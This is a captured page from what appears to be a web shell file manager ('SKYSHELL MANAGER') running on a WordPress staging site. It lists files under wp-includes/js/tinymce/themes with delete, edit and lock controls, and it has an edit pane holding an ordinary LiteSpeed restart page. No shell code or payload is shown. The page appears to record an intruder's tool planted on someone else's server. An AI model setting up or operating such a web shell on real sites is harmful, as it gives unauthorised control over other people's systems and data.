📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: restart.html
<html> <head> <title>Restarting LiteSpeed server ...</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <script language="javascript"> <!-- begin function go() { location.replace('/service/serviceMgr.php?state=restarted'); } // end --> </script> <style type="text/css" media="screen"> body { font-family:sans-serif; color:#BBB; background-color:#FFF; } </style> </head> <body onload="javascript:window.setTimeout('go()',2500)"> <center> <h2 style="margin-top:150px">Graceful Restart in Progress</h2> <h3>Please wait...</h3> <p></p> <img src='/static/images/working.gif'> </center> </body> </html>
Save